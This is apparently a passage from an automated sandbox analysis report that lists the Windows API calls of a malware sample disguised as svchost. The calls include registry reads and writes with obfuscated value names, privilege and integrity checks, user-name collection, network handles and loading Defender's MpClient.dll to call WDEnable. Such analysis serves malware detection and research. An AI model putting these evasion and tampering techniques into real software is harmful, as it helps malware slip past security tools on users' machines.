                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4F31F671E412286AEF25DB79CC4DBEE7B6CAF08744F500598E659E2180D7B04B848BE1
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT ref: 02C96B41
                                                                                                                                                                                                              • memset.MSVCRT ref: 02C96B5F
                                                                                                                                                                                                              • RegOpenKeyExA.KERNEL32(00000001,software\microsoft,00000000,00000101,80000001,?,?,?,?,?,00000000), ref: 02C96B7A
                                                                                                                                                                                                              • RegQueryValueExA.KERNEL32(80000001,5DD2BAAFa,00000000,00000001,?,00000104,?,?,?,?,?,00000000), ref: 02C96BA1
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000110,?,?,?,?,?,?,?,00000000), ref: 02C96C1A
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 02C96C21
                                                                                                                                                                                                              • memset.MSVCRT ref: 02C96C35
                                                                                                                                                                                                              • lstrcpynA.KERNEL32(00000000,00000000,00000104,?,?,?,?,?,?,?,?,00000000), ref: 02C96C4E
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(80000001,?,?,?,?,?,00000000), ref: 02C96C5C
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: memset$Heap$AllocCloseOpenProcessQueryValuelstrcpyn
                                                                                                                                                                                                              • String ID: 5DD2BAAFa$software\microsoft
                                                                                                                                                                                                              • API String ID: 217510255-2040404611
                                                                                                                                                                                                              • Opcode ID: 66468a6739b327f882d7d7ade55cb9966f2c2f57501c0bc41e10c69f4a99bec8
                                                                                                                                                                                                              • Instruction ID: 81f1705bd98395ffdb4f97a24b2c6ee10d77a72c6c9a3c66ee346a02e3f99dbd
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 66468a6739b327f882d7d7ade55cb9966f2c2f57501c0bc41e10c69f4a99bec8
                                                                                                                                                                                                              • Instruction Fuzzy Hash: B931E670E452186AEB25DB64CC4DBDE7B7CEF08744F5045A8F649E6180E7B09788CBE0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • OpenProcess.KERNEL32(00000400,00000000,00000000,00000000,00000000,74DF0F00,?,?,?,?,?,?,?,?,02C97F74), ref: 02CB4895
                                                                                                                                                                                                              • OpenProcessToken.ADVAPI32(00000000,00000018,?,?,?,?,?,?,?,?,?,02C97F74), ref: 02CB48AC
                                                                                                                                                                                                              • GetTokenInformation.KERNELBASE(?,00000007(TokenIntegrityLevel),?,00000010,?,?,?,?,?,?,?,?,?,02C97F74), ref: 02CB48CA
                                                                                                                                                                                                              • CharUpperA.USER32(?,?,?,?,?,?,?,?,?,02C97F74), ref: 02CB48E2
                                                                                                                                                                                                              • CharUpperA.USER32(?,?,?,?,?,?,?,?,?,02C97F74), ref: 02CB4908
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(?,00000000), ref: 02CB493B
                                                                                                                                                                                                              • FindCloseChangeNotification.KERNEL32(?), ref: 02CB494C
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?), ref: 02CB495E
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02CB496F
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: HandleInformation$CharCloseOpenProcessTokenUpper$ChangeFindNotification
                                                                                                                                                                                                              • String ID: *SYSTEM*$ADVA
                                                                                                                                                                                                              • API String ID: 4044281766-3691563785
                                                                                                                                                                                                              • Opcode ID: 5816b24be4d165de533bbe4c763764cba9890f29417885028c7be616f3f4c536
                                                                                                                                                                                                              • Instruction ID: 84b298b07b80629918c95634d484236134a293567097bb3aace268b1622cf80c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5816b24be4d165de533bbe4c763764cba9890f29417885028c7be616f3f4c536
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1B31F871D44309AFEB25CBA4C898FEE7BBCBF88315F444598EA05A7042D774DA08CB61
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT ref: 0040211E
                                                                                                                                                                                                              • SHGetFolderPathA.SHELL32(00000000,00000026,00000000,00000000,?), ref: 00402134
                                                                                                                                                                                                              • PathAppendA.SHLWAPI(?,Windows Defender), ref: 0040214A
                                                                                                                                                                                                              • SetCurrentDirectoryA.KERNEL32(?), ref: 00402157
                                                                                                                                                                                                              • LoadLibraryA.KERNEL32(MpClient.dll), ref: 00402166
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,WDEnable), ref: 0040217B
                                                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000), ref: 004021AC
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2972647321.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2972647321.000000000045E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: LibraryPath$AddressAppendCurrentDirectoryFolderFreeLoadProcmemset
                                                                                                                                                                                                              • String ID: MpClient.dll$WDEnable$Windows Defender$v-@
                                                                                                                                                                                                              • API String ID: 1010965793-1794910726
                                                                                                                                                                                                              • Opcode ID: 9a8801f81893ad2c186c2148835d49196fca5eda48d8657e7ad32c24086763b8
                                                                                                                                                                                                              • Instruction ID: 6149f717096a9febd0c21d278ea6f34184d08bed9f30ffe58492fd99f82aed82
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9a8801f81893ad2c186c2148835d49196fca5eda48d8657e7ad32c24086763b8
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5A11D5B2940318BFD7219FA4DD49FAEB76CEB48710F00037AF705B22C0D27C4A418AA8
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CoInitializeEx.OLE32(00000000,00000002), ref: 0040269F
                                                                                                                                                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000), ref: 004026CD
                                                                                                                                                                                                              • SysAllocString.OLEAUT32(?), ref: 004026E0
                                                                                                                                                                                                              • SysAllocString.OLEAUT32(Windows Explorer), ref: 004026F2
                                                                                                                                                                                                              • CoCreateInstance.OLE32(00404E70,00000000,00004401,00404E80,?), ref: 0040271B
                                                                                                                                                                                                              • CoCreateInstance.OLE32(00404E90,00000000,00004401,00404EA0,?), ref: 004027CF
                                                                                                                                                                                                              • SysFreeString.OLEAUT32(00402DB5), ref: 0040285D
                                                                                                                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 00402864
                                                                                                                                                                                                              • CoUninitialize.OLE32 ref: 004028BE
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2972647321.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2972647321.000000000045E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: String$AllocCreateFreeInstance$FileInitializeModuleNameUninitialize
                                                                                                                                                                                                              • String ID: Windows Explorer
                                                                                                                                                                                                              • API String ID: 1140695583-228612681
                                                                                                                                                                                                              • Opcode ID: 8bb4e062025032df17ae7dd21582db741fec3b94b95eb974e8202e97bb420e09
                                                                                                                                                                                                              • Instruction ID: b52a01207190e4a30f96b10a649eeabca6697c1dd3b0d782d0755018a236c0da
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8bb4e062025032df17ae7dd21582db741fec3b94b95eb974e8202e97bb420e09
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2E714175A006169FCB10EB99CD88DAFB7B9AF88300B24816AE504F73D0D7B5ED42CB54
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT ref: 02CB5023
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000110,?,00000000,00000000), ref: 02CB5032
                                                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000,?,00000000,00000000), ref: 02CB5039
                                                                                                                                                                                                              • memset.MSVCRT ref: 02CB5051
                                                                                                                                                                                                              • GetUserNameA.ADVAPI32(00000000,00000104), ref: 02CB5068
                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,00000000,00000000), ref: 02CB506E
                                                                                                                                                                                                                • Part of subcall function 02CA41E0: GetProcessHeap.KERNEL32(00000008,02CB5097,00000000,75A934D0,?,?,02CB5084,00000104,?,?,?,?,00000000,00000000), ref: 02CA41FE
                                                                                                                                                                                                                • Part of subcall function 02CA41E0: HeapAlloc.KERNEL32(00000000,?,?,02CB5084,00000104,?,?,?,?,00000000,00000000), ref: 02CA4205
                                                                                                                                                                                                                • Part of subcall function 02CA41E0: memset.MSVCRT ref: 02CA4215
                                                                                                                                                                                                              • GetUserNameA.ADVAPI32(00000000,00000104), ref: 02CB508F
                                                                                                                                                                                                              • StrChrIA.SHLWAPI(?,?,?,00000000,?,?,?,?,00000000,00000000), ref: 02CB50B6
                                                                                                                                                                                                              • lstrcpynA.KERNEL32(?,00000001,00000104,?,?,00000000,?,?,?,?,00000000,00000000), ref: 02CB50CA
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789, xrefs: 02CB5000
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$memset$NameProcessUser$AllocAllocateErrorLastlstrcpyn
                                                                                                                                                                                                              • String ID: ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789
                                                                                                                                                                                                              • API String ID: 2345603349-374730529
                                                                                                                                                                                                              • Opcode ID: f209c446325afc861f6a67be7a87297d97be79f0b7a6d1151610daa95663e1e0
                                                                                                                                                                                                              • Instruction ID: 4c26f76f3d998e08cce2d63ff0606f16ab34097713ca3c5420a7cb86b4d98540
                                                                                                                                                                                                              • Opcode Fuzzy Hash: f209c446325afc861f6a67be7a87297d97be79f0b7a6d1151610daa95663e1e0
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1D212772D00216ABD72296649C44FFBB7BDAFC4781F600519FA4597180EB70AB059BE0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT ref: 02CA2587
                                                                                                                                                                                                              • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?,?,74DEF550,00000000), ref: 02CA259E
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(?,?,74DEF550,00000000), ref: 02CA25AB
                                                                                                                                                                                                              • PathFileExistsA.SHLWAPI(?,?,74DEF550,00000000), ref: 02CA25E7
                                                                                                                                                                                                              • lstrcpynA.KERNEL32(02CE9F08,00000000,00000104,00000000,00000001,?,74DEF550,00000000), ref: 02CA2611
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,74DEF550,00000000), ref: 02CA2620
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000,?,74DEF550,00000000), ref: 02CA2623
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,74DEF550,00000000), ref: 02CA2630
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000,?,74DEF550,00000000), ref: 02CA2633
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$Path$Process$BackslashExistsFileFolderFreeValidatelstrcpynmemset
                                                                                                                                                                                                              • String ID: 5dd2bfbfa
                                                                                                                                                                                                              • API String ID: 780088666-1606156145
                                                                                                                                                                                                              • Opcode ID: b14b6990d02c375d6c6bbe6ac1fbcbc3e452e8228e2fc05537d24f2015e383f5
                                                                                                                                                                                                              • Instruction ID: 60094a307c6325eb8c34fa39e25c3cd77b9ab4506eda3a44da84726e2ba20442
                                                                                                                                                                                                              • Opcode Fuzzy Hash: b14b6990d02c375d6c6bbe6ac1fbcbc3e452e8228e2fc05537d24f2015e383f5
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9E112971B8231567DB2056385C29FDB7B5CAB91B51F400650F98AEB1C0DFF19980CAE1
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,?,00000000,?,?,00000000), ref: 02CA4EFF
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000,?,?,00000000), ref: 02CA4F02
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,?,00000000), ref: 02CA4F0F
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000,?,?,00000000), ref: 02CA4F12
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,?,00000000), ref: 02CA4F2A
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000,?,?,00000000), ref: 02CA4F2D
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,?,00000000), ref: 02CA4F3A
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000,?,?,00000000), ref: 02CA4F3D
                                                                                                                                                                                                              • InternetCloseHandle.WININET(00000000), ref: 02CA4F53
                                                                                                                                                                                                              • InternetCloseHandle.WININET(00000000), ref: 02CA4F5D
                                                                                                                                                                                                              • InternetCloseHandle.WININET(00000000), ref: 02CA4F67
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$Process$CloseHandleInternet$FreeValidate
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 278890334-0
                                                                                                                                                                                                              • Opcode ID: aa878b2dcbd17afb5e1e0ae6f857dd7a2fd116a45e22b08c9e3c9b451d86d99d
                                                                                                                                                                                                              • Instruction ID: e956d4fb7bc3abdf94b5338bcdc05b73248bb892563fbf0c07e60305fd756b21
                                                                                                                                                                                                              • Opcode Fuzzy Hash: aa878b2dcbd17afb5e1e0ae6f857dd7a2fd116a45e22b08c9e3c9b451d86d99d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3C21D231A062556BDB28ABB59C5CFDF7BACEF88759F000469F609E3140DAB1D910CBA0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 02CA478A
                                                                                                                                                                                                              • memset.MSVCRT ref: 02CA47C0
                                                                                                                                                                                                              • RegOpenKeyExA.ADVAPI32(80000001,software\microsoft,00000000,00000101,?,?,?,00000000), ref: 02CA47E7
                                                                                                                                                                                                              • RegQueryValueExA.ADVAPI32(?,00000001,00000000,00000001,00000000,00000104,?,?,00000000), ref: 02CA480A
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000015,?,?,00000000), ref: 02CA487D
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 02CA4884
                                                                                                                                                                                                              • memset.MSVCRT ref: 02CA4894
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 02CA48C2
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heapmemset$AdminAllocCloseOpenProcessQueryUserValue
                                                                                                                                                                                                              • String ID: software\microsoft
                                                                                                                                                                                                              • API String ID: 1484339481-3673152959
                                                                                                                                                                                                              • Opcode ID: a0e1b737ecad05c29ad7b07bebbff276a2548421223424be814d2def5af7eb3d
                                                                                                                                                                                                              • Instruction ID: 06395caa23cd51dd3ddafb7d43bb002611d1b775c999fa85a2c96f98ab72df1c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a0e1b737ecad05c29ad7b07bebbff276a2548421223424be814d2def5af7eb3d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: E941F9329011DA9BDB39CF65A825FDEBBB9AF81B48F144294ED44E7100D7B09705CBE0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 02CAA068
                                                                                                                                                                                                              • RegOpenKeyExA.ADVAPI32(80000001,software\microsoft,00000000,00000101,02CAA227), ref: 02CAA09F
                                                                                                                                                                                                              • RegQueryValueExA.ADVAPI32(02CAA227,5dd2beaba,00000000,?,00000000,?), ref: 02CAA0BC
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(02CAA227), ref: 02CAA0C6
                                                                                                                                                                                                              • RegOpenKeyExA.KERNEL32(80000002,software\microsoft,00000000,00000101,?), ref: 02CAA0F9
                                                                                                                                                                                                              • RegQueryValueExA.KERNEL32(?,5dd2beaba,00000000,?,00000000,?), ref: 02CAA116
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 02CAA120
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CloseOpenQueryValue$AdminUser
                                                                                                                                                                                                              • String ID: 5dd2beaba$software\microsoft
                                                                                                                                                                                                              • API String ID: 2113243795-3143834697
                                                                                                                                                                                                              • Opcode ID: 397e5fae1bd2be3fbc695d6d31c84ef7cd7f5fdec393e196ea087ec9ea803043
                                                                                                                                                                                                              • Instruction ID: d547e1b9ff2c681df750c955d19d7f06485663d273b217e1dcec33d9f1c1cc0a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 397e5fae1bd2be3fbc695d6d31c84ef7cd7f5fdec393e196ea087ec9ea803043
                                                                                                                                                                                                              • Instruction Fuzzy Hash: B7213375E51209FBEB10DBA4CC95FEEBBB8EF44744F904559E601E6140E7B4A704CB90
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 02CA36B8
                                                                                                                                                                                                              • RegOpenKeyExA.ADVAPI32(80000001,software\microsoft,00000000,00000101,?), ref: 02CA36EF
                                                                                                                                                                                                              • RegQueryValueExA.ADVAPI32(?,5DD2BEE3a,00000000,?,00000000,?), ref: 02CA370C
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 02CA3716
                                                                                                                                                                                                              • RegOpenKeyExA.KERNEL32(80000002,software\microsoft,00000000,00000101,?), ref: 02CA3749
                                                                                                                                                                                                              • RegQueryValueExA.KERNEL32(?,5DD2BEE3a,00000000,?,00000000,?), ref: 02CA3766
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 02CA3770
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CloseOpenQueryValue$AdminUser
                                                                                                                                                                                                              • String ID: 5DD2BEE3a$software\microsoft
                                                                                                                                                                                                              • API String ID: 2113243795-2156778992
                                                                                                                                                                                                              • Opcode ID: bb2f6417133eaa5284f1d51139061700f9059a6b568445040d9d68163a3b7c06
                                                                                                                                                                                                              • Instruction ID: 54ae6539ab5709fa08543c701d2eec663e088b69fdbff6ea61f8a3ae30840bcc
                                                                                                                                                                                                              • Opcode Fuzzy Hash: bb2f6417133eaa5284f1d51139061700f9059a6b568445040d9d68163a3b7c06
                                                                                                                                                                                                              • Instruction Fuzzy Hash: C9214FB5E5020AFBEB10CFA4CD95FEEB7B8AB44744F904699E501E7140E7B4A6048B94
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 02C93428
                                                                                                                                                                                                              • RegOpenKeyExA.ADVAPI32(80000001,software\microsoft,00000000,00000101,02CA5B76), ref: 02C9345F
                                                                                                                                                                                                              • RegQueryValueExA.ADVAPI32(02CA5B76,5dd2bf39a,00000000,?,00000000,?), ref: 02C9347C
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(02CA5B76), ref: 02C93486
                                                                                                                                                                                                              • RegOpenKeyExA.KERNEL32(80000002,software\microsoft,00000000,00000101,?), ref: 02C934B9
                                                                                                                                                                                                              • RegQueryValueExA.KERNEL32(?,5dd2bf39a,00000000,?,00000000,?), ref: 02C934D6
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 02C934E0
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CloseOpenQueryValue$AdminUser
                                                                                                                                                                                                              • String ID: 5dd2bf39a$software\microsoft
                                                                                                                                                                                                              • API String ID: 2113243795-1636192762
                                                                                                                                                                                                              • Opcode ID: ebe68d21e884c4691b3eb2940b6fc41b847eef10bca0540beeb3a27b749235cf
                                                                                                                                                                                                              • Instruction ID: dba55b4fb70a5a400228a3b7bf03fbfe7ad63de05adeffa5908a7da7c13769ab
                                                                                                                                                                                                              • Opcode Fuzzy Hash: ebe68d21e884c4691b3eb2940b6fc41b847eef10bca0540beeb3a27b749235cf
                                                                                                                                                                                                              • Instruction Fuzzy Hash: E5212175E51209FBEF10CBA4CC99FEEBBB8EB44744F904599E501E7180E7B4A7448B90
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT ref: 02CA4664
                                                                                                                                                                                                              • RegOpenKeyExA.KERNEL32(00000104,software\microsoft,00000000,00000101,80000002,?,00000000,00000000), ref: 02CA4687
                                                                                                                                                                                                              • RegQueryValueExA.KERNEL32(80000002,?,00000000,00000001,00000000,00000104,?,00000000,00000000), ref: 02CA46AA
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000015,?,00000000,00000000), ref: 02CA471D
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,00000000,00000000), ref: 02CA4724
                                                                                                                                                                                                              • memset.MSVCRT ref: 02CA4734
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(80000002,?,00000000,00000000), ref: 02CA4762
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heapmemset$AllocCloseOpenProcessQueryValue
                                                                                                                                                                                                              • String ID: software\microsoft
                                                                                                                                                                                                              • API String ID: 4043890984-3673152959
                                                                                                                                                                                                              • Opcode ID: c3e47be48cc4f586f0ddc9112b71e428c5b18efc2b13a790934d325aaff4efba
                                                                                                                                                                                                              • Instruction ID: 3e84c2931f18eddb7d55180c0332165c71a27b62514ee4d9cda26da6f219142e
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c3e47be48cc4f586f0ddc9112b71e428c5b18efc2b13a790934d325aaff4efba
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 19312B32D0125A9BDB36CB648C58FDB7BB9AFC6748F1542A4E954D7100D7B0AB48CBE0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 02CAA147
                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 02CAA159
                                                                                                                                                                                                              • RegOpenKeyExA.KERNEL32(?,software\microsoft,00000000,00000102,02CAA33F,?,02CAA33F), ref: 02CAA173
                                                                                                                                                                                                              • RegSetValueExA.KERNEL32(02CAA33F,5dd2beaba,00000000,00000004,00000004,00000004,02CAA33F), ref: 02CAA190
                                                                                                                                                                                                              • RegFlushKey.ADVAPI32(?), ref: 02CAA19A
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 02CAA1A4
                                                                                                                                                                                                              Strings
